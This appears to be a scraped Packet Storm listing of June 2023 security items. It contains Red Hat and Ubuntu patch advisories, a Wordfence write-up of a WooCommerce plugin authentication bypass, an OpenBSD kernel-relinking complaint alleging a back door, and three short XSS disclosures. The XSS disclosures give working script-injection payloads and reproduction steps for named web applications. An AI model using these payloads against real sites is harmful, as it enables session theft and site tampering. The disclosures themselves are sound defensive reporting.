Red Hat Security Advisory 2023-3662-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3662-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3662  
Issue date:        2023-06-19  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
c-ares-1.13.0-6.el8_6.1.src.rpm

aarch64:  
c-ares-1.13.0-6.el8_6.1.aarch64.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.aarch64.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.aarch64.rpm  
c-ares-devel-1.13.0-6.el8_6.1.aarch64.rpm

ppc64le:  
c-ares-1.13.0-6.el8_6.1.ppc64le.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.ppc64le.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.ppc64le.rpm  
c-ares-devel-1.13.0-6.el8_6.1.ppc64le.rpm

s390x:  
c-ares-1.13.0-6.el8_6.1.s390x.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.s390x.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.s390x.rpm  
c-ares-devel-1.13.0-6.el8_6.1.s390x.rpm

x86_64:  
c-ares-1.13.0-6.el8_6.1.i686.rpm  
c-ares-1.13.0-6.el8_6.1.x86_64.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.i686.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.x86_64.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.i686.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.x86_64.rpm  
c-ares-devel-1.13.0-6.el8_6.1.i686.rpm  
c-ares-devel-1.13.0-6.el8_6.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJBO/NzjgjWX9erEAQgRpg//WQjN7RY+rAztCBocuoVgyDDw5Mlr+j4a  
uFVMFcNacTHfb3LJUcbqwSHddSjvh/gantYuc71EUifiRd+SaGb8YWBP6VpL84Xh  
QRO6hyWRSMH4TT8k2AjycR602VV61N9PfZRuKySDL6Qrwq8FxAou3h+Rq2DWN9as  
Eq2QTipj/qomEtF9Jtl3CY3ouAG8Es/TP7q0X9PFY1RrKH2bqt6Cuck8dM0+NvKj  
glT0nIAujoamsqbKbEEUrEimEMTSTZhMxY+HQlDKX18Zgf8egV2TERyYXcVrOp6o  
2AHMqbc4CJL1mn+C8Q6Lbgpn1cbZ/xo8yoIw43EfbziMmlrefWoT1vT1z4p2TiWs  
2vogVce0B/yh2izVyO+LA6lIe+60W50OHSam69MEh3puLndgaE3FLjUUB/D7smjG  
RjKnJBUHiGrq7+EHjctGKGD33t9/iw7RRdIsrXDE+Mf9Ez2/PIiBKfSKKAiWSf0u  
hRzQbMX5Uul+AoPDa3xBBcNRIQx6pZhTew9zK2r39BLg4rvqEfzChEJDHbGtO0cH  
q3LF5+7KJheWv0zPLd7gUBu01XD9ec+d5E4ewJpEZR+DfEMoDmlVZdS+f1IACtZC  
CsRVsFS0IMFJCxUuc4C2aSYtUoDJ+5X905DyuXc6KfqUIeQFpmiA2sUjll87q7Zi  
cuooXmznn8A=  
=nNv8  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3662-01

The automatic and mandatory-by-default reordering of OpenBSD kernels is not transactional and as a result, a local unpatched exploit exists which allows tampering or replacement of the kernel. Arbitrary build artifacts are cyclically relinked with no data integrity or provenance being maintained or verified for the objects being consumed with respect to the running kernel before and during the execution of the mandatory kernel_reorder process in the supplied /etc/rc and /usr/libexec scripts. The reordering occurs at the end of installation process and also automatically every reboot cycle thereafter unless manually bypassed by a knowledgeable party.

    The automatic and mandatory-by-default reordering of OpenBSD kernelsis NOT transactional and as a result, a local unpatched exploit existswhich allows tampering or replacement of the kernel. Arbitrary buildartifacts are cyclically relinked with no data integrity or provenancebeing maintained or verified for the objects being consumed withrespect to the running kernel before and during the execution of themandatory kernel_reorder process in the supplied /etc/rc and/usr/libexec scripts. The reordering occurs at the end of installationprocess and also automatically every reboot cycle thereafter unlessmanually bypassed by a knowledgable party.The kernel_reorder routine verifies a SHA256 signature for the linkedkernel from last boot but does not verify the integrity or provenanceof any objects kept in the kernel "link kit" installed in/usr/share/relink, so arbitrary objects can be injected andautomatically relinked at the next startup. I have verified that it isindeed the case that both valid kernels with a different uname andkernels which cause data destruction due to over-tuning of a subset ofthe components which were compiled manually and copied into/usr/share/relink and crash the system after being booted oncerelinked but which do not match the build of the running kernel at thetime they were copied into /usr/share/relink as workingproof-of-concept exploits.Install media are also open to tampering and exploitation as signedchecksum data are not carried with the install sets inside theinstallation image and an improperly-encapsulated poorly-documentedtarball of unverifiable (in the sense of SLSA) kernel objects isembedded in the base distribution and then relinked with a new randomordering of the objects cyclically between boot cycles.Sites with a strong security posture are advised that this is acritical vulnerability and likely deliberate back door into thesystem. Additionally, OpenBSD leaks the state of the pseudorandomnumber generator to predictable locations on disk and in system memoryat a fixed point during every start up and shutdown procedure. Thelack of build process hardening has been on-going for over threeyears. Theo de Raadt is disinterested in improving or reviewing thedesign or providing any further clarification, as he has stated on themailing list when shortfalls in the relinking process were reportedover the past ~3 years. I hope that this can come to the attention ofa third-party technical expert with standing in the computer securityindustry.Workaround:As the link kit is embedded in the base distribution and automaticallyrelinked without an option to disable it in the provided installationscript it requires manual removal at present.Cf.https://marc.info/?l=openbsd-bugs&m=159074964523007&w=2 (noted lack ofidempotency)https://marc.info/?l=openbsd-bugs&m=168688579123005&w=2 (noted lack ofintegrity or provenance verification and the consumption of invalidobjects)https://slsa.dev/spec/v1.0/levels#build-l2-hosted-build-platform:"Track/Level Requirements                 Focus Build L3       Hardened build platform      Tampering during the build"

OpenBSD Kernel Relinking Issue

Ubuntu Security Notice 6083-2 - USN-6083-1 fixed a vulnerability in cups-filters. This update provides the corresponding update for Ubuntu 16.04 LTS. It was discovered that cups-filters incorrectly handled the beh CUPS backend. A remote attacker could possibly use this issue to cause the backend to stop responding or to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6083-2  
June 19, 2023

cups-filters vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

cups-filters could be made to crash or run programs if it received  
specially crafted network traffic.

Software Description:  
- cups-filters: OpenPrinting CUPS Filters

Details:

USN-6083-1 fixed a vulnerability in cups-filters. This update provides  
the corresponding update for Ubuntu 16.04 LTS.

Original advisory details:

  It was discovered that cups-filters incorrectly handled the beh CUPS  
  backend. A remote attacker could possibly use this issue to cause the  
  backend to stop responding or to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   cups-filters                    1.8.3-2ubuntu3.5+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6083-2  
   https://ubuntu.com/security/notices/USN-6083-1  
   CVE-2023-24805

Ubuntu Security Notice USN-6083-2

WG Ticket version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/40101/                                      ││  Vendor   : KreativDev                                                                 ││  Software : WG Ticket 1.0 - Ticket and Support System                                  ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /add-ticket-postPOST parameter 'subject' is vulnerable to RXSS-----------------------------271612615641839361601287503567Content-Disposition: form-data; name="subject"lulze1cbq<script>alert(1)</script>nzxns-----------------------------27161261564183936160128751. Sign UP & Login in any Normal User2. Click on +Open New Request3. In Subject Put Your XSS Payload4. Submit5. XSS Fired on User Browser6. When the Admin Visit the Ticket page From Admin Panel on this Path https://website/admin-tickets7. The XSS Will Fire on his browser[-] Done

WG Ticket 1.0 Cross Site Scripting

Diafan CMS version 6.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)# Exploit Author: tmrswrr / Hulya Karabag# Vendor Homepage: https://www.diafancms.com/# Version: 6.0# Tested on: https://demo.diafancms.comDescription:1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:Payload : "><script>alert(document.domain)<%2Fscript>2) After will you see alert button : https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

Diafan CMS 6.0 Cross Site Scripting

WordPress Abandoned Cart Lite for WooCommerce plugin versions 5.14.2 and below suffer from an authentication bypass vulnerability.

    On May 29, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in Tyche Softwares’s Abandoned Cart Lite for WooCommerce plugin, which is actively installed on more than 30,000 WordPress websites. This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 7, 2023. Sites still using the free version of Wordfence will receive the same protection on July 7, 2023.We contacted Tyche Softwares on May 30, 2023, and received a response the next day. After providing full disclosure details, the developer released a patch on June 6, 2023. We would like to commend the Tyche Softwares development team for their prompt response and timely patch.We urge users to update their sites with the latest patched version of Abandoned Cart Lite for WooCommerce, version 5.15.1 at the time of this writing, as soon as possible.Vulnerability Summary from Wordfence IntelligenceDescription: Abandoned Cart Lite for WooCommerce <= 5.14.2 – Authentication Bypass Affected Plugin: Abandoned Cart Lite for WooCommercePlugin Slug: woocommerce-abandoned-cartAffected Versions: <= 5.14.2CVE ID: CVE-2023-2986CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Lana Codes Fully Patched Version: 5.15.1The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, who are typically customers.Technical AnalysisThe Abandoned Cart Lite for WooCommerce plugin, according to its settings, sends a notification to customers who have not completed the purchase process, who have, in other words, abandoned their cart. The notification contains a link that automatically logs in the customer to continue their purchase. Examining the code reveals that the link contains an encrypted value, which identifies the abandoned cart.[View this code snippet on the blog]  The link only works if it contains the properly encrypted value, which requires the encryption key to create. However, we found that the encryption key is hardcoded in the plugin, which means that threat actors also have access to it. Due to this, it is possible to create a link using the key that includes the abandoned cart identifier of other users, since each cart identifier is a sequentially increasing number starting from one.[View this code snippet on the blog]  An attacker is limited to what users they can log in as due to the fact that it is only possible to login as a user with an abandoned cart. Considering the requirement of an abandoned cart, in most cases an attacker will only be able to log in as a customer-level user. However, there is a chance that by exploiting the authentication bypass vulnerability, an attacker can gain access to an administrative user account, or another higher-level user account if they have been testing the abandoned cart functionality. Regardless, this is a severe vulnerability that can lead to customer sensitive information being exposed at its best and complete compromise of a site at its worst.Update Notice and RecommendationWe would also like to make a note that the developers made the functionality backward compatible in version 5.15.0, which means that old abandoned carts can be exploited even if the plugin is updated to that version. Further security hardening was introduced in version 5.15.1 that ensures sites are no longer vulnerable through old abandoned cart links, therefore, we recommend making sure all sites are updated to that version.Disclosure TimelineMay 29, 2023 – Discovery of the Authentication Bypass vulnerability in Abandoned Cart Lite for WooCommerce.May 30, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.May 31, 2023 – The vendor confirms the inbox for handling the discussion.May 31, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.June 6, 2023 – A fully patched version of the plugin, 5.15.0, is released.June 7, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. Please note we delayed the firewall rule to prevent completely breaking the plugin’s core functionality.June 13, 2023 – A fully patched version of the plugin, 5.15.1, is released.July 7, 2023 – Wordfence Free users receive the same protection.ConclusionIn this blog post, we have detailed an Authentication Bypass vulnerability within the Abandoned Cart Lite for WooCommerce plugin affecting versions 5.14.2 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to the accounts of users who have abandoned their carts. The vulnerability has been fully addressed in version 5.15.1 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of Abandoned Cart Lite for WooCommerce, which is 5.15.1.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 7, 2023. Sites still using the free version of Wordfence will receive the same protection on July 7, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Abandoned Cart Lite For WooCommerce 5.14.2 Authentication Bypass

Ubuntu Security Notice 6166-2 - USN-6166-1 fixed a vulnerability in libcap2. This update provides the corresponding update for Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 ESM. Richard Weinberger discovered that libcap2 incorrectly handled certain long input strings. An attacker could use this issue to cause libcap2 to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6166-2  
June 19, 2023

libcap2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

libcap could be made to crash or possibly execute arbitrary code  
if it received a specially crafted input.

Software Description:  
- libcap2: POSIX 1003.1e capabilities (library)

Details:

USN-6166-1 fixed a vulnerability in libcap2. This update provides  
the corresponding update for Ubuntu 14.04 ESM, Ubuntu 16.04 ESM  
and Ubuntu 18.04 ESM.

Original advisory details:

 Richard Weinberger discovered that libcap2 incorrectly handled certain long  
 input strings. An attacker could use this issue to cause libcap2 to crash,  
 resulting in a denial of service, or possibly execute arbitrary code.  
 (CVE-2023-2603)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libcap2                         1:2.25-1.2ubuntu0.1~esm1  
  libcap2-bin                     1:2.25-1.2ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  libcap2                         1:2.24-12ubuntu0.1~esm1  
  libcap2-bin                     1:2.24-12ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  libcap2                         1:2.24-0ubuntu2+esm1  
  libcap2-bin                     1:2.24-0ubuntu2+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6166-2  
  https://ubuntu.com/security/notices/USN-6166-1  
  CVE-2023-2603

Ubuntu Security Notice USN-6166-2

Coursela Personal Course Selling Website version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/user/kreativdev/portfolio                           ││  Vendor   : KreativDev                                                                 ││  Software : Coursela - Personal Course Selling Website 1.0                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /coursesGET parameter 'min' is vulnerable to RXSShttps://website/courses?type=free&category=software-development&min=4443874%3balert(1)%2f%2f165&max=99Path: /coursesGET parameter 'max' is vulnerable to RXSShttps://website/courses?type=free&category=software-development&min=44&max=9989896%3balert(1)%2f%2f939[-] Done

Coursela Personal Course Selling Website 1.0 Cross Site Scripting

Ubuntu Security Notice 6170-1 - It was discovered that Podman incorrectly handled certain images. An attacker could possibly use this issue to pull an untrusted image.

    ==========================================================================Ubuntu Security Notice USN-6170-1June 16, 2023libpod vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Podman could be made to pull an untrusted image.Software Description:- libpod: engine to run OCI-based containers in PodsDetails:It was discovered that Podman incorrectly handled certain images.An attacker could possibly use this issue to pull an untrusted image.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  podman                          3.4.4+ds1-1ubuntu1.22.04.1  podman-docker                   3.4.4+ds1-1ubuntu1.22.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6170-1  https://launchpad.net/bugs/2007972Package Information:  https://launchpad.net/ubuntu/+source/libpod/3.4.4+ds1-1ubuntu1.22.04.1

Ubuntu Security Notice USN-6170-1

Ubuntu Security Notice 6176-1 - It was discovered that PyPDF2 incorrectly handled certain PDF files. If a user or automated system were tricked into processing a specially crafted file, an attacker could possibly use this issue to consume system resources, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6176-1  
June 19, 2023

pypdf2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

PyPDF2 could be made to crash if it opened a specially crafted  
file.

Software Description:  
- pypdf2: Pure-Python library built as a PDF toolkit (Python 3)

Details:

It was discovered that PyPDF2 incorrectly handled certain PDF files. If a  
user or automated system were tricked into processing a specially crafted  
file, an attacker could possibly use this issue to consume system  
resources, resulting in a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   python3-pypdf2                  1.26.0-4ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   python-pypdf2                   1.26.0-3ubuntu1.20.04.1  
   python3-pypdf2                  1.26.0-3ubuntu1.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   python-pypdf2                   1.26.0-2ubuntu0.1~esm1  
   python3-pypdf2                  1.26.0-2ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   python-pypdf2                   1.25.1-1ubuntu0.1~esm1  
   python3-pypdf2                  1.25.1-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6176-1  
   CVE-2022-24859

Package Information:  
   https://launchpad.net/ubuntu/+source/pypdf2/1.26.0-4ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/pypdf2/1.26.0-3ubuntu1.20.04.1

Source

Packet Storm